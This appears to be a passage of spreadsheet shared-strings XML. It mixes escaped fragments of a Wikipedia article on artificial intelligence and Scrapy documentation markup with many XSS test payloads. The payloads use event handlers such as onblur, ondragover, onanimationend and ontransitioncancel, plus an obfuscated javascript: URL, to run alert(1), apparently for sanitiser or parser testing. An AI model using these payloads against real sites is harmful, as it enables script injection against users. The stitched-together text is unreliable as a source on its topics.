    <t>&lt;p&gt;Early on, deep learning was also applied to sequence learning with &lt;a href="/wiki/Recurrent_neural_network" title="Recurrent neural network"&gt;recurrent neural networks &lt;/a&gt; (RNNs)&lt;sup id="cite_ref-Recurrent_neural_networks_259-0" class="reference"&gt;&lt;a href="#cite_note-Recurrent_neural_networks-259"&gt;&amp;#91;248&amp;#93; &lt;/a&gt; &lt;/sup&gt; which are in theory Turing complete&lt;sup id="cite_ref-260" class="reference"&gt;&lt;a href="#cite_note-260"&gt;&amp;#91;249&amp;#93; &lt;/a&gt; &lt;/sup&gt; and can run arbitrary programs to process arbitrary sequences of inputs. The depth of an RNN is unlimited and depends on the length of its input sequence; thus, an RNN is an example of deep learning.&lt;sup id="cite_ref-schmidhuber2015_246-3" class="reference"&gt;&lt;a href="#cite_note-schmidhuber2015-246"&gt;&amp;#91;235&amp;#93; &lt;/a&gt; &lt;/sup&gt; RNNs can be trained by &lt;a href="/wiki/Gradient_descent" title="Gradient descent"&gt;gradient descent &lt;/a&gt;&lt;sup id="cite_ref-261" class="reference"&gt;&lt;a href="#cite_note-261"&gt;&amp;#91;250&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-262" class="reference"&gt;&lt;a href="#cite_note-262"&gt;&amp;#91;251&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-263" class="reference"&gt;&lt;a href="#cite_note-263"&gt;&amp;#91;252&amp;#93; &lt;/a&gt; &lt;/sup&gt; but suffer from the &lt;a href="/wiki/Vanishing_gradient_problem" title="Vanishing gradient problem"&gt;vanishing gradient problem &lt;/a&gt;.&lt;sup id="cite_ref-goodfellow2016_247-1" class="reference"&gt;&lt;a href="#cite_note-goodfellow2016-247"&gt;&amp;#91;236&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-hochreiter1991_264-0" class="reference"&gt;&lt;a href="#cite_note-hochreiter1991-264"&gt;&amp;#91;253&amp;#93; &lt;/a&gt; &lt;/sup&gt; In 1992, it was shown that unsupervised pre-training of a stack of &lt;a href="/wiki/Recurrent_neural_network" title="Recurrent neural network"&gt;recurrent neural networks &lt;/a&gt; can speed up subsequent supervised learning of deep sequential problems.&lt;sup id="cite_ref-SCHMID1992_265-0" class="reference"&gt;&lt;a href="#cite_note-SCHMID1992-265"&gt;&amp;#91;254&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;br onblur=alert(1) tabindex=1 id=x&gt;&lt;/br&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Search for questions on the archives of the &lt;a class="reference external" href="https://groups.google.com/forum/#!forum/scrapy-users"&gt;scrapy-users mailing list&lt;/a&gt;.&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;strike id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/strike&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Yann_LeCun" title="Yann LeCun"&gt;Yann LeCun &lt;/a&gt; (2016). Slides on Deep Learning &lt;a rel="nofollow" class="external text" href="https://indico.cern.ch/event/510372/"&gt;Online &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160423021403/https://indico.cern.ch/event/510372/"&gt;Archived &lt;/a&gt; 23 April 2016 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;var id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;article onpaste="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;pre onpointerenter=alert(1)&gt;XSS&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;code onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/code&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 18 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound oncontextmenu="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>Uninformed searches (&lt;a href="/wiki/Breadth_first_search" class="mw-redirect" title="Breadth first search"&gt;breadth first search &lt;/a&gt;, &lt;a href="/wiki/Depth_first_search" class="mw-redirect" title="Depth first search"&gt;depth first search &lt;/a&gt; and general &lt;a href="/wiki/State_space_search" title="State space search"&gt;state space search &lt;/a&gt;):</t>
  </si>
  <si>
    <t>&lt;shadow onclick="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;meta onkeydown="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;marquee ondragover=alert(1) contenteditable&gt;drop here&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;thead onmouseout="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;input onmouseout="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;input draggable="true" ondragleave="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a href="/wiki/Feature_detection_(computer_vision)" title="Feature detection (computer vision)"&gt;Feature detection &lt;/a&gt; (pictured: </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Recent developments in autonomous automobiles have made the innovation of self-driving trucks possible, though they are still in the testing phase. The UK government has passed legislation to begin testing of self-driving truck platoons in 2018.&lt;sup id="cite_ref-309" class="reference"&gt;&lt;a href="#cite_note-309"&gt;&amp;#91;298&amp;#93; &lt;/a&gt; &lt;/sup&gt; Self-driving truck platoons are a fleet of self-driving trucks following the lead of one non-self-driving truck, so the truck platoons aren't entirely autonomous yet. Meanwhile, the Daimler, a German automobile corporation, is testing the Freightliner Inspiration which is a semi-autonomous truck that will only be used on the highway.&lt;sup id="cite_ref-310" class="reference"&gt;&lt;a href="#cite_note-310"&gt;&amp;#91;299&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;meta charset="UTF-8"/&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-199"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-199"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;meter draggable="true" ondrag="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;rtc style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;div ondragover=alert(1) contenteditable&gt;drop here&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;center draggable="true" ondragstart="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;td onkeydown="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.economist.com/news/science-and-technology/21721890-games-help-them-understand-reality-why-ai-researchers-video-games"&gt;"Why AI researchers like video games" &lt;/a&gt;. &lt;i&gt;The Economist &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20171005051028/https://www.economist.com/news/science-and-technology/21721890-games-help-them-understand-reality-why-ai-researchers-video-games"&gt;Archived &lt;/a&gt; from the original on 5 October 2017. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Economist&amp;amp;rft.atitle=Why+AI+researchers+like+video+games&amp;amp;rft_id=https%3A%2F%2Fwww.economist.com%2Fnews%2Fscience-and-technology%2F21721890-games-help-them-understand-reality-why-ai-researchers-video-games&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;hgroup style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;rtc draggable="true" ondragenter="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Distributed_computing" title="Distributed computing"&gt;Distributed computing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;big id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/big&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;body onpointerout=alert(1)&gt;XSS&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;svg draggable="true" ondragstart="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robert_Trappl" title="Robert Trappl"&gt;Robert Trappl &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt onmouseout="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;listing onpointerenter=alert(1)&gt;XSS&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;animate onpointerleave=alert(1)&gt;XSS&lt;/animate&gt;</t>
  </si>
  <si>
    <t>&lt;map draggable="true" ondragenter="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;meta name="referrer" content="origin-when-crossorigin"/&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onmousedown="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav&amp;#x09;ascript:alert('');"&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/architecture.html"&gt;Architecture overview&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Transhumanism" title="Transhumanism"&gt;Transhumanism &lt;/a&gt; (the merging of humans and machines) is explored in the &lt;a href="/wiki/Manga" title="Manga"&gt;manga &lt;/a&gt; &lt;i&gt;&lt;a href="/wiki/Ghost_in_the_Shell" title="Ghost in the Shell"&gt;Ghost in the Shell &lt;/a&gt; &lt;/i&gt; and the science-fiction series &lt;i&gt;&lt;a href="/wiki/Dune_(novel)" title="Dune (novel)"&gt;Dune &lt;/a&gt; &lt;/i&gt;. In the 1980s, artist &lt;a href="/wiki/Hajime_Sorayama" title="Hajime Sorayama"&gt;Hajime Sorayama &lt;/a&gt;'s Sexy Robots series were painted and published in Japan depicting the actual organic human form with lifelike muscular metallic skins and later "the Gynoids" book followed that was used by or influenced movie makers including &lt;a href="/wiki/George_Lucas" title="George Lucas"&gt;George Lucas &lt;/a&gt; and other creatives. Sorayama never considered these organic robots to be real part of nature but always unnatural product of the human mind, a fantasy existing in the mind even when realized in actual form.</t>
  </si>
  <si>
    <t xml:space="preserve">              &lt;div class="version"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;113–163 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-29"&gt;&lt;a href="#Probabilistic_methods_for_uncertain_reasoning"&gt;&lt;span class="tocnumber"&gt;6.3 </t>
  </si>
  <si>
    <t>&lt;figure draggable="true" ondragend="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Word_processor" title="Word processor"&gt;Word processing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Naive_Bayes_classifier-229"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Naive_Bayes_classifier_229-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;basefont onmouseleave="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;img onmouseover="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;cite onpointerout=alert(1)&gt;XSS&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Many problems in AI (in reasoning, planning, learning, perception, and robotics) require the agent to operate with incomplete or uncertain information. AI researchers have devised a number of powerful tools to solve these problems using methods from &lt;a href="/wiki/Probability" title="Probability"&gt;probability &lt;/a&gt; theory and economics.&lt;sup id="cite_ref-Stochastic_methods_for_uncertain_reasoning_204-0" class="reference"&gt;&lt;a href="#cite_note-Stochastic_methods_for_uncertain_reasoning-204"&gt;&amp;#91;199&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 19 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Uncertain_reasoning-89"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Uncertain_reasoning_89-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFvan_der_WaltBernard2006"&gt;van der Walt &amp;amp; Bernard 2006 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;template onpaste="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Intelligent agents must be able to set goals and achieve them.&lt;sup id="cite_ref-Planning_110-0" class="reference"&gt;&lt;a href="#cite_note-Planning-110"&gt;&amp;#91;107&amp;#93; &lt;/a&gt; &lt;/sup&gt; They need a way to visualize the future—a representation of the state of the world and be able to make predictions about how their actions will change it—and be able to make choices that maximize the &lt;a href="/wiki/Utility" title="Utility"&gt;utility &lt;/a&gt; (or "value") of available choices.&lt;sup id="cite_ref-Information_value_theory_111-0" class="reference"&gt;&lt;a href="#cite_note-Information_value_theory-111"&gt;&amp;#91;108&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;menu onkeydown="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onblur=alert(1) tabindex=1 id=x&gt;&lt;/menuitem&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onmouseout="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;ruby draggable="true" ondragstart="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-326"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-326"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;table draggable="true" ondrag="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;u onkeydown="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMcCarthyMinskyRochesterShannon1955" class="citation web"&gt;&lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;McCarthy, John &lt;/a&gt;; &lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Minsky, Marvin &lt;/a&gt;; &lt;a href="/wiki/Nathan_Rochester" class="mw-redirect" title="Nathan Rochester"&gt;Rochester, Nathan &lt;/a&gt;; &lt;a href="/wiki/Claude_Shannon" title="Claude Shannon"&gt;Shannon, Claude &lt;/a&gt; (1955). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20070826230310/http://www-formal.stanford.edu/jmc/history/dartmouth/dartmouth.html"&gt;"A Proposal for the Dartmouth Summer Research Project on Artificial Intelligence" &lt;/a&gt;. Archived from &lt;a rel="nofollow" class="external text" href="http://www-formal.stanford.edu/jmc/history/dartmouth/dartmouth.html"&gt;the original &lt;/a&gt; on 26 August 2007&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 August </t>
  </si>
  <si>
    <t>&lt;area oncopy="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onbeforecut="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;img onkeydown="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;abbr id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/abbr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Knight, Will (2017). &lt;a rel="nofollow" class="external text" href="https://www.technologyreview.com/s/608871/finally-a-driverless-car-with-some-common-sense/"&gt;"Boston may be famous for bad drivers, but it's the testing ground for a smarter self-driving car" &lt;/a&gt;. &lt;i&gt;MIT Technology Review &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;27 March </t>
  </si>
  <si>
    <t>&lt;br id=x tabindex=1 onfocus=alert(1)&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup draggable="true" ondragleave="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;bdo style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext id=x tabindex=1 onactivate=alert(1)&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onbeforecut="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Integrating the approaches </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;section id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/Calculus_ratiocinator" title="Calculus ratiocinator"&gt;Calculus ratiocinator &lt;/a&gt; &lt;/i&gt; and &lt;i&gt;&lt;a href="/wiki/Characteristica_universalis" title="Characteristica universalis"&gt;characteristica universalis &lt;/a&gt; &lt;/i&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-39"&gt;&lt;a href="#Cybersecurity"&gt;&lt;span class="tocnumber"&gt;7.4 </t>
  </si>
  <si>
    <t>&lt;sub oncontextmenu="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;~363–379, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;center onmouseover="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;code id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;tt style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;marquee draggable="true" ondragenter="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Deep_feedforward_neural_networks"&gt;Deep feedforward neural networks </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;nextid ondragover=alert(1) contenteditable&gt;drop here&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;track id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/track&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;u onkeyup="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;img onmouseout="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;dir onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/dir&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;th id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onblur=alert(1) tabindex=1 id=x&gt;&lt;/noscript&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup oncopy="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/exceptions.html"&gt;&lt;span class="doc"&gt;Exceptions</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;source ondragover=alert(1) contenteditable&gt;drop here&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay controls onpause=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;meter style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;font onkeypress="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;sup id=x tabindex=1 onactivate=alert(1)&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;path&gt;&lt;animateMotion onend=alert(1) dur=1s repeatCount=1&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mental_event" title="Mental event"&gt;Mental event &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blink onpaste="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;nextid ondrop=alert(1) contenteditable&gt;drop here&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onbeforepaste="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" ondragleave="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;strike onpaste="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;i onmouseenter="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;head onkeypress="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;col onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/col&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1938) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/noscript&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;div id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;main onmouseenter="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Kermany, D; Goldbaum, M; Zhang, Kang (2018). &lt;a rel="nofollow" class="external text" href="https://www.cell.com/action/captchaChallenge?redirectUri=%2Fcell%2Fpdf%2FS0092-8674%2818%2930154-5.pdf"&gt;"Identifying Medical Diagnoses and Treatable Diseases by Image-Based Deep Learning" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;One proposal to deal with this is to ensure that the first generally intelligent AI is '&lt;a href="/wiki/Friendly_AI" class="mw-redirect" title="Friendly AI"&gt;Friendly AI &lt;/a&gt;' and will be able to control subsequently developed AIs. Some question whether this kind of check could actually remain in place.</t>
  </si>
  <si>
    <t>&lt;param onkeydown="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Propositional_logic" class="mw-redirect" title="Propositional logic"&gt;Propositional logic &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;details onbeforecut="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;basefont style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;img onpointerover=alert(1)&gt;XSS&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onpointerout=alert(1)&gt;XSS&lt;/ruby&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-103"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-103"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-70"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-70"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;time onpointerup=alert(1)&gt;XSS&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;iframe id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;textarea ondrop=alert(1) contenteditable&gt;drop here&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;rb onkeydown="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;tt onpointerleave=alert(1)&gt;XSS&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;isindex ondrop=alert(1) contenteditable&gt;drop here&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;code onpointerenter=alert(1)&gt;XSS&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_mind" title="Philosophy of mind"&gt;Mind &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onkeyup="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;summary id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;frame onbeforepaste="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;object draggable="true" ondragstart="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="//docs.scrapy.org/_/downloads/en/latest/htmlzip/"&gt;html&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onkeypress="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-334"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-334"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
